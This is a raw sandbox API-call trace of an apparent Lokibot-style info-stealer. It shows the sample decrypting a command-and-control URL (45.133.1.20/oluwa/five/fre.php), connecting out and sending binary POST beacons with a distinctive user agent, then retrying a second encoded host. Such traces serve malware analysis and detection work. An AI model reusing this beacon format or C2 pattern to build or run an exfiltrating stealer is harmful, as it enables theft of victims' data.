[0260.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.720] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.721] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.721] GetProcessHeap () returned 0x6a0000 [0260.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0260.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.722] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0260.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.723] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.724] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0260.724] GetProcessHeap () returned 0x6a0000 [0260.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.726] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0260.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.727] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0260.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.728] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0260.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.729] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0260.729] GetProcessHeap () returned 0x6a0000 [0260.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0260.729] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0260.729] GetProcessHeap () returned 0x6a0000 [0260.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0260.729] socket (af=2, type=1, protocol=6) returned 0x8e4 [0260.729] connect (s=0x8e4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0260.754] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0260.754] GetProcessHeap () returned 0x6a0000 [0260.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0260.754] GetProcessHeap () returned 0x6a0000 [0260.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0260.755] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.756] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.756] GetProcessHeap () returned 0x6a0000 [0260.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0260.756] GetProcessHeap () returned 0x6a0000 [0260.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0260.757] GetProcessHeap () returned 0x6a0000 [0260.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0260.758] GetProcessHeap () returned 0x6a0000 [0260.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0260.758] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.759] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.759] GetProcessHeap () returned 0x6a0000 [0260.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0260.759] GetProcessHeap () returned 0x6a0000 [0260.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0260.759] send (s=0x8e4, buf=0x6bd460*, len=242, flags=0) returned 242 [0260.760] send (s=0x8e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0260.760] GetProcessHeap () returned 0x6a0000 [0260.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0260.760] recv (in: s=0x8e4, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0260.825] GetProcessHeap () returned 0x6a0000 [0260.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0260.825] GetProcessHeap () returned 0x6a0000 [0260.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0260.826] GetProcessHeap () returned 0x6a0000 [0260.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0260.826] GetProcessHeap () returned 0x6a0000 [0260.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0260.827] closesocket (s=0x8e4) returned 0 [0260.828] GetProcessHeap () returned 0x6a0000 [0260.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0260.828] GetProcessHeap () returned 0x6a0000 [0260.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.828] GetProcessHeap () returned 0x6a0000 [0260.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0260.829] GetProcessHeap () returned 0x6a0000 [0260.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0260.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1628) returned 0x8e4 [0260.832] Sleep (dwMilliseconds=0xea60) [0260.850] GetProcessHeap () returned 0x6a0000 [0260.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0260.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.851] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.863] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0260.872] GetProcessHeap () returned 0x6a0000 [0260.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0260.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.874] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0260.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.875] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.876] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.876] GetProcessHeap () returned 0x6a0000 [0260.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0260.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.877] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0260.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.878] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.879] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0260.879] GetProcessHeap () returned 0x6a0000 [0260.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.880] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.880] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.881] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.888] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.888] GetProcessHeap () returned 0x6a0000 [0260.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0260.888] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.888] GetProcessHeap () returned 0x6a0000 [0260.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0260.888] GetProcessHeap () returned 0x6a0000 [0260.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.889] GetProcessHeap () returned 0x6a0000 [0260.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0260.889] GetProcessHeap () returned 0x6a0000 [0260.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0260.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0260.901] GetProcessHeap () returned 0x6a0000 [0260.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0260.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.903] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0260.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.904] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.906] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.906] GetProcessHeap () returned 0x6a0000 [0260.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0260.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.907] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0260.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.908] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.909] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0260.909] GetProcessHeap () returned 0x6a0000 [0260.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.910] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0260.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.911] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0260.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.912] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0260.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.912] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0260.912] GetProcessHeap () returned 0x6a0000 [0260.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0260.913] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0260.913] GetProcessHeap () returned 0x6a0000 [0260.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0260.913] socket (af=2, type=1, protocol=6) returned 0x8e8 [0260.913] connect (s=0x8e8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0260.939] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0260.939] GetProcessHeap () returned 0x6a0000 [0260.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0260.939] GetProcessHeap () returned 0x6a0000 [0260.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0260.940] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.941] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.941] GetProcessHeap () returned 0x6a0000 [0260.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0260.941] GetProcessHeap () returned 0x6a0000 [0260.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0260.942] GetProcessHeap () returned 0x6a0000 [0260.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0260.942] GetProcessHeap () returned 0x6a0000 [0260.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0260.942] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.943] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.943] GetProcessHeap () returned 0x6a0000 [0260.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0260.943] GetProcessHeap () returned 0x6a0000 [0260.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0260.944] send (s=0x8e8, buf=0x6bd460*, len=242, flags=0) returned 242 [0260.944] send (s=0x8e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0260.945] GetProcessHeap () returned 0x6a0000 [0260.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0260.945] recv (in: s=0x8e8, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0261.024] GetProcessHeap () returned 0x6a0000 [0261.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0261.025] GetProcessHeap () returned 0x6a0000 [0261.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0261.026] GetProcessHeap () returned 0x6a0000 [0261.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0261.026] GetProcessHeap () returned 0x6a0000 [0261.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0261.027] closesocket (s=0x8e8) returned 0 [0261.028] GetProcessHeap () returned 0x6a0000 [0261.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0261.028] GetProcessHeap () returned 0x6a0000 [0261.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.028] GetProcessHeap () returned 0x6a0000 [0261.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0261.029] GetProcessHeap () returned 0x6a0000 [0261.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0261.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x162c) returned 0x8e8 [0261.031] Sleep (dwMilliseconds=0xea60) [0261.033] GetProcessHeap () returned 0x6a0000 [0261.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0261.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0261.077] GetProcessHeap () returned 0x6a0000 [0261.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0261.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.078] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0261.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.079] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.081] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.081] GetProcessHeap () returned 0x6a0000 [0261.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0261.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.082] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0261.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.087] CryptDestroyKey (hKey=0x6ad020) returned 1 [0261.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.088] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0261.088] GetProcessHeap () returned 0x6a0000 [0261.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.089] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.091] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.092] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.094] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.094] GetProcessHeap () returned 0x6a0000 [0261.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0261.094] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.094] GetProcessHeap () returned 0x6a0000 [0261.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0261.098] GetProcessHeap () returned 0x6a0000 [0261.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.099] GetProcessHeap () returned 0x6a0000 [0261.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0261.099] GetProcessHeap () returned 0x6a0000 [0261.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0261.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.101] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.120] GetProcessHeap () returned 0x6a0000 [0261.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0261.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.143] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.144] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.192] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.192] GetProcessHeap () returned 0x6a0000 [0261.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0261.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.194] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0261.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.195] CryptDestroyKey (hKey=0x6ad4e0) returned 1 